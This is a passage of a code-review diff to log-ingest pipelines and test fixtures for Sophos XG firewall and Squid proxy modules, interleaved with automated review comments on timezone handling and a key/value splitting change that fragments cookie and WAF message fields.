!= null" timezone: "{{ event.timezone }}" field: _temp_.time target_field: "@timestamp" 
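Review bot: The two `rename` processors added before the `remove` step in antivirus.yml carry no comment saying why upper-case `FTP_direction` and `FTP_url` keys now reach this pipeline. They appear only because the `kv` `field_split` in pipeline.yml is widened to `[a-zA-Z0-9…]` in the same commit, so a one-line comment such as `# kv keeps the key case from the log line; map FTP_* onto the lower-case ftp_* field names` would tie the two changes together. Other mixed-case keys in the updated fixtures (`sophos.xg.Mode`, `sophos.xg.SysLog_SERVER_NAME`) are left as they are, so the comment should also say which naming convention is intended. The processor list continues outside the hunk.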
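Review bot: The widened `field_split` lookahead in the `kv` processor splits on any space followed by `word=`, including inside quoted values, so text taken from the request ends up as separate `sophos.xg.*` fields. The updated waf.log-expected.json shows it: `sophos.xg.cookie` shrinks to `;` while the session cookie becomes `sophos.xg.PHPSESSID`, and the `extra` message is cut into `sophos.xg.sqli: ","` and `sophos.xg.xss: "): Last Matched Message: …"`; the `SQLi`/`XSS` renames added to waf.yml then give those fragments schema names. Because cookie and query-string content is supplied by the client, indexed field values can be set or truncated from outside the firewall, which weakens the log as evidence and stores session identifiers in a field of their own. A split that ignores spaces inside double quotes would avoid this, for example `field_split: " (?=[a-zA-Z0-9_\\-]+=)(?=(?:[^\"]*\"[^\"]*\")*[^\"]*$)"`; this is untested here and needs checking against unquoted values such as `branch_name=Gaurav Patel`.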
@@ -48,6 +48,26 @@ processors: - yyyy-MM-dd HH:mm:ss z - ISO8601 +- date: + if: "ctx?.event.timezone == null && ctx?.sophos?.xg?.eventtime != null" + field: sophos.xg.eventtime + target_field: sophos.xg.eventtime + formats: + - yyyy-MM-dd HH:mm:ss + - yyyy-MM-dd HH:mm:ss Z + - yyyy-MM-dd HH:mm:ss z + - ISO8601 +- date: + if: "ctx.event.timezone != null && ctx?.sophos?.xg?.eventtime != null" + timezone: "{{ event.timezone }}" + field: sophos.xg.eventtime + target_field: sophos.xg.eventtime + formats: + - yyyy-MM-dd HH:mm:ss + - yyyy-MM-dd HH:mm:ss Z + - yyyy-MM-dd HH:mm:ss z + - ISO8601 + # Sets starts, end and duration when start and duration is known - script: lang: painless diff --git a/x-pack/filebeat/module/sophos/xg/ingest/waf.yml b/x-pack/filebeat/module/sophos/xg/ingest/waf.yml index 8e58395a3bf..e0ea89c41dc 100644 --- a/x-pack/filebeat/module/sophos/xg/ingest/waf.yml +++ b/x-pack/filebeat/module/sophos/xg/ingest/waf.yml @@ -266,6 +266,14 @@ processors: ############# ## Cleanup ## ############# +- rename: + field: sophos.xg.SQLi + target_field: sophos.xg.sqli + ignore_missing: true +- rename: + field: sophos.xg.XSS + target_field: sophos.xg.xss + ignore_missing: true - remove: field: - sophos.xg.bytesrcv diff --git a/x-pack/filebeat/module/sophos/xg/test/anti-virus.log-expected.json b/x-pack/filebeat/module/sophos/xg/test/anti-virus.log-expected.json index 65b2d6abdfd..4afefcee9b4 100644 --- a/x-pack/filebeat/module/sophos/xg/test/anti-virus.log-expected.json +++ b/x-pack/filebeat/module/sophos/xg/test/anti-virus.log-expected.json @@ -542,6 +542,8 @@ "sophos.xg.device": "SFW", "sophos.xg.device_name": "SF01V", "sophos.xg.dst_country_code": "R1", + "sophos.xg.ftp_direction": "Upload", + "sophos.xg.ftp_url": "/var/www//home/ftp-user/ta_test_file_1ta-cl1-46", "sophos.xg.ftpcommand": "STOR", "sophos.xg.log_component": "FTP", "sophos.xg.log_subtype": "Virus", 
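Review bot: The two new `date` processors for `sophos.xg.eventtime` read `event.timezone` without the null-safe operator that this same commit adds to the `@timestamp` processors: the first uses `ctx?.event.timezone`, the second `ctx.event.timezone`. If `event` is absent the condition throws instead of evaluating to false (assuming nothing earlier in the pipeline guarantees the object), so both should use `ctx?.event?.timezone`, e.g. `if: "ctx?.event?.timezone == null && ctx?.sophos?.xg?.eventtime != null"` and its `!= null` counterpart. Neither processor sets `ignore_failure` or `on_failure`, so an `eventtime` outside the four listed formats presumably fails the document unless a pipeline-level handler exists outside the hunk. Zone abbreviations are also ambiguous: the RED fixtures added in event.log-expected.json end up with `sophos.xg.eventtime` at `+02:00` next to an `@timestamp` at `-02:00` for the same wall-clock time, which deserves a comment stating which offset is meant to win.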
@@ -549,7 +551,7 @@ "sophos.xg.message_id": "09001", "sophos.xg.priority": "Critical", "sophos.xg.src_country_code": "R1", - "sophos.xg.virus": "EICAR-AV-Test\" FTP_url=\"/var/www//home/ftp-user/ta_test_file_1ta-cl1-46\" FTP_direction=\"Upload", + "sophos.xg.virus": "EICAR-AV-Test", "source.bytes": 0, "source.ip": "10.146.13.49", "source.port": 39910, @@ -609,13 +611,14 @@ "service.type": "sophos", "sophos.xg.device": "SFW", "sophos.xg.device_name": "SF01V", + "sophos.xg.ftp_direction": "Download", + "sophos.xg.ftp_url": "/var/www//home/ftp-user/ta_test_file_1ta-cl1-46", "sophos.xg.ftpcommand": "RETR", "sophos.xg.log_component": "FTP", "sophos.xg.log_subtype": "Allowed", "sophos.xg.log_type": "Anti-Virus", "sophos.xg.message_id": "09002", "sophos.xg.priority": "Information", - "sophos.xg.virus": " FTP_url=\"/var/www//home/ftp-user/ta_test_file_1ta-cl1-46\" FTP_direction=\"Download", "source.bytes": 0, "source.ip": "10.146.13.49", "source.port": 39936, diff --git a/x-pack/filebeat/module/sophos/xg/test/event.log-expected.json b/x-pack/filebeat/module/sophos/xg/test/event.log-expected.json index a237d2d2a36..f08587eaa91 100644 --- a/x-pack/filebeat/module/sophos/xg/test/event.log-expected.json +++ b/x-pack/filebeat/module/sophos/xg/test/event.log-expected.json @@ -404,6 +404,7 @@ ], "server.bytes": 0, "service.type": "sophos", + "sophos.xg.Mode": "Remote Access", "sophos.xg.device": "SFW", "sophos.xg.device_name": "XG230", "sophos.xg.ipaddress": "10.82.234.5", @@ -411,7 +412,7 @@ "sophos.xg.log_subtype": "System", "sophos.xg.log_type": "Event", "sophos.xg.message_id": "17824", - "sophos.xg.priority": "Information Mode=\"Remote Access", + "sophos.xg.priority": "Information", "sophos.xg.remote_ip": "10.82.234.12", "sophos.xg.starttime": "0", "sophos.xg.status": "Established", 
@@ -523,6 +524,52 @@ "forwarded" ] }, + { + "@timestamp": "2020-05-18T14:39:07.000-02:00", + "client.ip": "10.83.234.5", + "event.code": "062009617502", + "event.dataset": "sophos.xg", + "event.kind": "event", + "event.module": "sophos", + "event.original": "device=\"SFW\" date=2020-05-18 time=14:39:07 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=062009617502 log_type=\"Event\" log_component=\"GUI\" log_subtype=\"Admin\" status=\"Successful\" priority=Information user_name=\"admin\" src_ip=10.83.234.5 SysLog_SERVER_NAME='Logstash' message=\"SysLog Server 'Logstash' settings were changed by 'admin' from '10.83.234.5' using 'GUI'\"", + "event.severity": "6", + "event.timezone": "-02:00", + "fileset.name": "xg", + "host.name": "some_other_host.local", + "input.type": "log", + "log.level": "informational", + "log.offset": 4674, + "message": "SysLog Server 'Logstash' settings were changed by 'admin' from '10.83.234.5' using 'GUI'", + "observer.product": "XG", + "observer.serial_number": "1234567890123457", + "observer.type": "firewall", + "observer.vendor": "Sophos", + "related.hosts": [ + "some_other_host.local" + ], + "related.ip": [ + "10.83.234.5" + ], + "related.user": [ + "admin" + ], + "service.type": "sophos", + "sophos.xg.SysLog_SERVER_NAME": "'Logstash'", + "sophos.xg.device": "SFW", + "sophos.xg.device_name": "XG230", + "sophos.xg.log_component": "GUI", + "sophos.xg.log_subtype": "Admin", + "sophos.xg.log_type": "Event", + "sophos.xg.message_id": "17502", + "sophos.xg.priority": "Information", + "sophos.xg.status": "Successful", + "source.ip": "10.83.234.5", + "source.user.name": "admin", + "tags": [ + "sophos-xg", + "forwarded" + ] + }, { "@timestamp": "2020-05-18T14:39:08.000-02:00", "client.ip": "172.66.35.15", 
@@ -712,6 +759,144 @@ ], "user.name": "elastic.user@elastic.test.com" }, + { + "@timestamp": "2017-03-16T12:56:01.000-02:00", + "client.bytes": 0, + "destination.bytes": 0, + "event.code": "066811618014", + "event.dataset": "sophos.xg", + "event.duration": 164000000000000, + "event.end": "2017-03-18T10:29:21.000-02:00", + "event.kind": "event", + "event.module": "sophos", + "event.original": "device=\"SFW\" date=2017-03-16 time=12:56:01 timezone=\"IST\" device_name=\"XG125w\" device_id=S1601E1F9FCB7EE log_id=066811618014 log_type=\"Event\" log_component=\"RED\" log_subtype=\"System\" priority=Information red_id=A350196C47072B0 status=\"Connected\" eventtime=\"2017-03-16 12:56:01 IST\" duration=164000 branch_name=Gaurav Patel recv_bytes=0 sent_bytes=0 message=\"A350196C47072B0/Gaurav Patel is now re-connected after 164000 ms\"", + "event.severity": "6", + "event.start": "2017-03-16T12:56:01.000-02:00", + "event.timezone": "-02:00", + "fileset.name": "xg", + "host.name": "firewall.localgroup.local", + "input.type": "log", + "log.level": "informational", + "log.offset": 6643, + "message": "A350196C47072B0/Gaurav Patel is now re-connected after 164000 ms", + "observer.product": "XG", + "observer.serial_number": "S1601E1F9FCB7EE", + "observer.type": "firewall", + "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], + "server.bytes": 0, + "service.type": "sophos", + "sophos.xg.branch_name": "Gaurav Patel", + "sophos.xg.device": "SFW", + "sophos.xg.device_name": "XG125w", + "sophos.xg.eventtime": "2017-03-16T12:56:01.000+02:00", + "sophos.xg.log_component": "RED", + "sophos.xg.log_subtype": "System", + "sophos.xg.log_type": "Event", + "sophos.xg.message_id": "18014", + "sophos.xg.priority": "Information", + "sophos.xg.red_id": "A350196C47072B0", + "sophos.xg.status": "Connected", + "source.bytes": 0, + "tags": [ + "sophos-xg", + "forwarded" + ] + }, + { + "@timestamp": "2017-03-16T12:53:27.000-02:00", + "client.bytes": 22368, + 
"destination.bytes": 31488, + "event.code": "066811618015", + "event.dataset": "sophos.xg", + "event.duration": 0, + "event.end": "2017-03-16T12:53:27.000-02:00", + "event.kind": "event", + "event.module": "sophos", + "event.original": "device=\"SFW\" date=2017-03-16 time=12:53:27 timezone=\"IST\" device_name=\"XG125w\" device_id=S1601E1F9FCB7EE log_id=066811618015 log_type=\"Event\" log_component=\"RED\" log_subtype=\"System\" priority=Information red_id=A350196C47072B0 status=\"Disconnected\" eventtime=\"2017-03-16 12:53:27 IST\" duration=0 branch_name=Gaurav Patel recv_bytes=31488 sent_bytes=22368 message=\"A350196C47072B0/Gaurav Patel is now disconnected\"", + "event.severity": "6", + "event.start": "2017-03-16T12:53:27.000-02:00", + "event.timezone": "-02:00", + "fileset.name": "xg", + "host.name": "firewall.localgroup.local", + "input.type": "log", + "log.level": "informational", + "log.offset": 7072, + "message": "A350196C47072B0/Gaurav Patel is now disconnected", + "observer.product": "XG", + "observer.serial_number": "S1601E1F9FCB7EE", + "observer.type": "firewall", + "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], + "server.bytes": 31488, + "service.type": "sophos", + "sophos.xg.branch_name": "Gaurav Patel", + "sophos.xg.device": "SFW", + "sophos.xg.device_name": "XG125w", + "sophos.xg.eventtime": "2017-03-16T12:53:27.000+02:00", + "sophos.xg.log_component": "RED", + "sophos.xg.log_subtype": "System", + "sophos.xg.log_type": "Event", + "sophos.xg.message_id": "18015", + "sophos.xg.priority": "Information", + "sophos.xg.red_id": "A350196C47072B0", + "sophos.xg.status": "Disconnected", + "source.bytes": 22368, + "tags": [ + "sophos-xg", + "forwarded" + ] + }, + { + "@timestamp": "2017-03-16T12:46:26.000-02:00", + "client.bytes": 0, + "destination.bytes": 0, + "event.code": "066811618016", + "event.dataset": "sophos.xg", + "event.duration": 0, + "event.end": "2017-03-16T12:46:26.000-02:00", + "event.kind": "event", + 
"event.module": "sophos", + "event.original": "device=\"SFW\" date=2017-03-16 time=12:46:26 timezone=\"IST\" device_name=\"XG125w\" device_id=S1601E1F9FCB7EE log_id=066811618016 log_type=\"Event\" log_component=\"RED\" log_subtype=\"System\" priority=Information red_id=A350196C47072B0 status=\"Interim\" eventtime=\"2017-03-16 12:46:26 IST\" duration=0 branch_name=NY recv_bytes=0 sent_bytes=0 message=\"A350196C47072B0/NY transfered bytes TX: 0 RX: 0\"", + "event.severity": "6", + "event.start": "2017-03-16T12:46:26.000-02:00", + "event.timezone": "-02:00", + "fileset.name": "xg", + "host.name": "firewall.localgroup.local", + "input.type": "log", + "log.level": "informational", + "log.offset": 7491, + "message": "A350196C47072B0/NY transfered bytes TX: 0 RX: 0", + "observer.product": "XG", + "observer.serial_number": "S1601E1F9FCB7EE", + "observer.type": "firewall", + "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], + "server.bytes": 0, + "service.type": "sophos", + "sophos.xg.branch_name": "NY", + "sophos.xg.device": "SFW", + "sophos.xg.device_name": "XG125w", + "sophos.xg.eventtime": "2017-03-16T12:46:26.000+02:00", + "sophos.xg.log_component": "RED", + "sophos.xg.log_subtype": "System", + "sophos.xg.log_type": "Event", + "sophos.xg.message_id": "18016", + "sophos.xg.priority": "Information", + "sophos.xg.red_id": "A350196C47072B0", + "sophos.xg.status": "Interim", + "source.bytes": 0, + "tags": [ + "sophos-xg", + "forwarded" + ] + }, { "@timestamp": "2018-06-06T11:12:10.000-02:00", "event.code": "063711517815", diff --git a/x-pack/filebeat/module/sophos/xg/test/waf.log-expected.json b/x-pack/filebeat/module/sophos/xg/test/waf.log-expected.json index 9a3920dc168..055f255a15a 100644 --- a/x-pack/filebeat/module/sophos/xg/test/waf.log-expected.json +++ b/x-pack/filebeat/module/sophos/xg/test/waf.log-expected.json 
@@ -286,8 +286,9 @@ "server.bytes": 739, "server.ip": "10.198.233.48", "service.type": "sophos", + "sophos.xg.PHPSESSID": "jetkd9iadd969hsr77jpj4q974; _pk_id.1.fc3a=3a6250e215194a92.1485866024.1.1485866069.1485866024.; _pk_ses.1.fc3a=*", "sophos.xg.contenttype": "text/html", - "sophos.xg.cookie": "; PHPSESSID=jetkd9iadd969hsr77jpj4q974; _pk_id.1.fc3a=3a6250e215194a92.1485866024.1.1485866069.1485866024.; _pk_ses.1.fc3a=*", + "sophos.xg.cookie": ";", "sophos.xg.device": "SFW", "sophos.xg.device_name": "XG230", "sophos.xg.extra": "EICAR-AV-Test", @@ -364,7 +365,7 @@ "sophos.xg.contenttype": "text/html", "sophos.xg.device": "SFW", "sophos.xg.device_name": "XG230", - "sophos.xg.extra": "Inbound Anomaly Score Exceeded (Total Score: 7, SQLi=, XSS=): Last Matched Message: Request Missing a User Agent Header", + "sophos.xg.extra": "Inbound Anomaly Score Exceeded (Total Score: 7,", "sophos.xg.fw_rule_id": "3", "sophos.xg.host": "83.97.20.30", "sophos.xg.log_component": "Web Application Firewall", @@ -373,6 +374,8 @@ "sophos.xg.priority": "Information", "sophos.xg.reason": "WAF Anomaly", "sophos.xg.responsetime": "608", + "sophos.xg.sqli": ",", + "sophos.xg.xss": "): Last Matched Message: Request Missing a User Agent Header", "source.as.number": 9009, "source.as.organization.name": "M247 Ltd", "source.bytes": 295, diff --git a/x-pack/filebeat/module/squid/log/config/input.yml b/x-pack/filebeat/module/squid/log/config/input.yml index 16d64b095c6..41163e62afa 100644 --- a/x-pack/filebeat/module/squid/log/config/input.yml +++ b/x-pack/filebeat/module/squid/log/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/squid/log/test/access1.log-expected.json b/x-pack/filebeat/module/squid/log/test/access1.log-expected.json index 21b51be2dc2..a5c38481912 100644 --- a/x-pack/filebeat/module/squid/log/test/access1.log-expected.json 
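Review bot: The new expected values in waf.log-expected.json look like a key/value split running inside field values rather than an intended change. In the first hunk `sophos.xg.cookie` shrinks to `";"` while a new field `sophos.xg.PHPSESSID` carries the rest of the cookie string, and in the second and third hunks `sophos.xg.extra` is cut at `Total Score: 7,` with the remainder landing in `sophos.xg.sqli` (`","`) and `sophos.xg.xss`. The cookie header is client-supplied, so request content would choose field names under `sophos.xg.*`, and a session identifier would be indexed under a key that no mapping or redaction rule anticipates; the truncated `extra` also loses the WAF reason text that searches on that field would match. The pipeline change that produces this output is outside this chunk, so this is inferred from the fixture alone. I would make the split respect the value's own delimiters and keep the previous expectations, e.g. `"sophos.xg.extra": "Inbound Anomaly Score Exceeded (Total Score: 7, SQLi=, XSS=): Last Matched Message: Request Missing a User Agent Header"`.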
+++ b/x-pack/filebeat/module/squid/log/test/access1.log-expected.json @@ -26,8 +26,8 @@ "login.yahoo.com" ], "related.ip": [ - "10.105.21.199", - "209.73.177.115" + "209.73.177.115", + "10.105.21.199" ], "related.user": [ "badeyek" @@ -37,8 +37,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "TCP_MISS", - "CONNECT" + "CONNECT", + "TCP_MISS" ], "rsa.misc.content_type": "-", "rsa.misc.result_code": "200", @@ -109,8 +109,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "GET", - "TCP_MISS" + "TCP_MISS", + "GET" ], "rsa.misc.content_type": "text/html", "rsa.misc.result_code": "200", @@ -170,8 +170,8 @@ "www.goonernews.com" ], "related.ip": [ - "207.58.145.61", - "10.105.21.199" + "10.105.21.199", + "207.58.145.61" ], "related.user": [ "badeyek" @@ -241,8 +241,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "GET", - "TCP_HIT" + "TCP_HIT", + "GET" ], "rsa.misc.content_type": "text/css", "rsa.misc.result_code": "200", @@ -300,8 +300,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "TCP_HIT", - "GET" + "GET", + "TCP_HIT" ], "rsa.misc.content_type": "text/javascript", "rsa.misc.result_code": "200", @@ -360,8 +360,8 @@ "www.goonernews.com" ], "related.ip": [ - "10.105.21.199", - "207.58.145.61" + "207.58.145.61", + "10.105.21.199" ], "related.user": [ "badeyek" @@ -503,8 +503,8 @@ "www.goonernews.com" ], "related.ip": [ - "10.105.21.199", - "207.58.145.61" + "207.58.145.61", + "10.105.21.199" ], "related.user": [ "badeyek" @@ -515,8 +515,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "GET", - "TCP_REFRESH_HIT" + "TCP_REFRESH_HIT", + "GET" ], "rsa.misc.content_type": "-", "rsa.misc.result_code": "304", 
@@ -576,8 +576,8 @@ "www.goonernews.com" ], "related.ip": [ - "10.105.21.199", - "207.58.145.61" + "207.58.145.61", + "10.105.21.199" ], "related.user": [ "badeyek" @@ -649,8 +649,8 @@ "www.goonernews.com" ], "related.ip": [ - "10.105.21.199", - "207.58.145.61" + "207.58.145.61", + "10.105.21.199" ], "related.user": [ "badeyek" @@ -720,8 +720,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "TCP_HIT", - "GET" + "GET", + "TCP_HIT" ], "rsa.misc.content_type": "image/gif", "rsa.misc.result_code": "200", @@ -859,8 +859,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "TCP_MISS", - "CONNECT" + "CONNECT", + "TCP_MISS" ], "rsa.misc.content_type": "-", "rsa.misc.result_code": "200", @@ -917,8 +917,8 @@ "impgb.tradedoubler.com" ], "related.ip": [ - "10.105.21.199", - "217.212.240.172" + "217.212.240.172", + "10.105.21.199" ], "related.user": [ "badeyek" @@ -1134,8 +1134,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "TCP_REFRESH_HIT", - "GET" + "GET", + "TCP_REFRESH_HIT" ], "rsa.misc.content_type": "-", "rsa.misc.result_code": "304", @@ -1195,8 +1195,8 @@ "www.goonernews.com" ], "related.ip": [ - "207.58.145.61", - "10.105.21.199" + "10.105.21.199", + "207.58.145.61" ], "related.user": [ "badeyek" @@ -1207,8 +1207,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "GET", - "TCP_REFRESH_HIT" + "TCP_REFRESH_HIT", + "GET" ], "rsa.misc.content_type": "-", "rsa.misc.result_code": "304", @@ -1275,8 +1275,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "TCP_MISS", - "GET" + "GET", + "TCP_MISS" ], "rsa.misc.content_type": "text/html", "rsa.misc.result_code": "200", 
@@ -1336,8 +1336,8 @@ "ff.connextra.com" ], "related.ip": [ - "10.105.21.199", - "213.160.98.161" + "213.160.98.161", + "10.105.21.199" ], "related.user": [ "badeyek" @@ -1409,8 +1409,8 @@ "dd.connextra.com" ], "related.ip": [ - "10.105.21.199", - "213.160.98.160" + "213.160.98.160", + "10.105.21.199" ], "related.user": [ "badeyek" @@ -1479,8 +1479,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "TCP_DENIED", - "GET" + "GET", + "TCP_DENIED" ], "rsa.misc.content_type": "text/html", "rsa.misc.result_code": "407", @@ -1604,8 +1604,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "GET", - "TCP_DENIED" + "TCP_DENIED", + "GET" ], "rsa.misc.content_type": "text/html", "rsa.misc.result_code": "407", @@ -1661,8 +1661,8 @@ "shttp.msg.yahoo.com" ], "related.ip": [ - "216.155.194.239", - "10.105.33.214" + "10.105.33.214", + "216.155.194.239" ], "related.user": [ "adeolaegbedokun" @@ -1732,8 +1732,8 @@ "hi5.com" ], "related.ip": [ - "204.13.51.238", - "10.105.47.218" + "10.105.47.218", + "204.13.51.238" ], "related.user": [ "nazsoau" @@ -1744,8 +1744,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "GET", - "TCP_MISS" + "TCP_MISS", + "GET" ], "rsa.misc.content_type": "text/html", "rsa.misc.result_code": "200", @@ -1870,8 +1870,8 @@ "shttp.msg.yahoo.com" ], "related.ip": [ - "10.105.33.214", - "216.155.194.239" + "216.155.194.239", + "10.105.33.214" ], "related.user": [ "adeolaegbedokun" @@ -1999,8 +1999,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "GET", - "TCP_IMS_HIT" + "TCP_IMS_HIT", + "GET" ], "rsa.misc.content_type": "text/css", "rsa.misc.result_code": "304", 
@@ -2058,8 +2058,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "GET", - "TCP_IMS_HIT" + "TCP_IMS_HIT", + "GET" ], "rsa.misc.content_type": "text/css", "rsa.misc.result_code": "304", @@ -2201,8 +2201,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "GET", - "TCP_MISS" + "TCP_MISS", + "GET" ], "rsa.misc.content_type": "text/css", "rsa.misc.result_code": "200", @@ -2461,8 +2461,8 @@ "shttp.msg.yahoo.com" ], "related.ip": [ - "216.155.194.239", - "10.105.33.214" + "10.105.33.214", + "216.155.194.239" ], "related.user": [ "adeolaegbedokun" @@ -2528,8 +2528,8 @@ "address.yahoo.com" ], "related.ip": [ - "10.105.33.214", - "209.191.93.51" + "209.191.93.51", + "10.105.33.214" ], "related.user": [ "adeolaegbedokun" @@ -2540,8 +2540,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "GET", - "TCP_MISS" + "TCP_MISS", + "GET" ], "rsa.misc.content_type": "text/xml", "rsa.misc.result_code": "200", @@ -2601,8 +2601,8 @@ "fxfeeds.mozilla.org" ], "related.ip": [ - "63.245.209.21", - "10.105.21.199" + "10.105.21.199", + "63.245.209.21" ], "related.user": [ "badeyek" @@ -2670,8 +2670,8 @@ "insider.msg.yahoo.com" ], "related.ip": [ - "68.142.231.252", - "10.105.33.214" + "10.105.33.214", + "68.142.231.252" ], "related.user": [ "adeolaegbedokun" @@ -2737,8 +2737,8 @@ "insider.msg.yahoo.com" ], "related.ip": [ - "10.105.33.214", - "68.142.194.14" + "68.142.194.14", + "10.105.33.214" ], "related.user": [ "adeolaegbedokun" @@ -2922,8 +2922,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "TCP_DENIED", - "POST" + "POST", + "TCP_DENIED" ], "rsa.misc.content_type": "text/html", "rsa.misc.result_code": "407", 
@@ -3037,8 +3037,8 @@ "radio.launch.yahoo.com" ], "related.ip": [ - "68.142.219.132", - "10.105.33.214" + "10.105.33.214", + "68.142.219.132" ], "related.user": [ "adeolaegbedokun" @@ -3164,8 +3164,8 @@ "radio.launch.yahoo.com" ], "related.ip": [ - "68.142.219.132", - "10.105.33.214" + "10.105.33.214", + "68.142.219.132" ], "related.user": [ "adeolaegbedokun" @@ -3302,8 +3302,8 @@ "radio.launch.yahoo.com" ], "related.ip": [ - "68.142.219.132", - "10.105.33.214" + "10.105.33.214", + "68.142.219.132" ], "related.user": [ "adeolaegbedokun" @@ -3442,8 +3442,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "TCP_DENIED", - "POST" + "POST", + "TCP_DENIED" ], "rsa.misc.content_type": "text/html", "rsa.misc.result_code": "407", @@ -3500,8 +3500,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "POST", - "TCP_DENIED" + "TCP_DENIED", + "POST" ], "rsa.misc.content_type": "text/html", "rsa.misc.result_code": "407", @@ -3640,8 +3640,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "GET", - "TCP_REFRESH_HIT" + "TCP_REFRESH_HIT", + "GET" ], "rsa.misc.content_type": "-", "rsa.misc.result_code": "304", @@ -3698,8 +3698,8 @@ "radio.launch.yahoo.com" ], "related.ip": [ - "10.105.33.214", - "68.142.219.132" + "68.142.219.132", + "10.105.33.214" ], "related.user": [ "adeolaegbedokun" @@ -3768,8 +3768,8 @@ "radio.launch.yahoo.com" ], "related.ip": [ - "68.142.219.132", - "10.105.33.214" + "10.105.33.214", + "68.142.219.132" ], "related.user": [ "adeolaegbedokun" @@ -3898,8 +3898,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "TCP_IMS_HIT", - "GET" + "GET", + "TCP_IMS_HIT" ], "rsa.misc.content_type": "image/gif", "rsa.misc.result_code": "304", 
@@ -4027,8 +4027,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "GET", - "TCP_REFRESH_MISS" + "TCP_REFRESH_MISS", + "GET" ], "rsa.misc.content_type": "application/xml", "rsa.misc.result_code": "200", @@ -4097,8 +4097,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "TCP_MISS", - "GET" + "GET", + "TCP_MISS" ], "rsa.misc.content_type": "image/gif", "rsa.misc.result_code": "200", @@ -4156,8 +4156,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "TCP_IMS_HIT", - "GET" + "GET", + "TCP_IMS_HIT" ], "rsa.misc.content_type": "image/jpeg", "rsa.misc.result_code": "304", @@ -4215,8 +4215,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "GET", - "TCP_HIT" + "TCP_HIT", + "GET" ], "rsa.misc.content_type": "image/jpeg", "rsa.misc.result_code": "200", @@ -4273,8 +4273,8 @@ "radio.launch.yahoo.com" ], "related.ip": [ - "10.105.33.214", - "68.142.219.132" + "68.142.219.132", + "10.105.33.214" ], "related.user": [ "adeolaegbedokun" @@ -4284,8 +4284,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "TCP_MISS", - "POST" + "POST", + "TCP_MISS" ], "rsa.misc.content_type": "text/html", "rsa.misc.result_code": "302", @@ -4415,8 +4415,8 @@ "radio.music.yahoo.com" ], "related.ip": [ - "10.105.33.214", - "68.142.219.132" + "68.142.219.132", + "10.105.33.214" ], "related.user": [ "adeolaegbedokun" @@ -4567,8 +4567,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "TCP_MISS", - "GET" + "GET", + "TCP_MISS" ], "rsa.misc.content_type": "text/html", "rsa.misc.result_code": "200", 
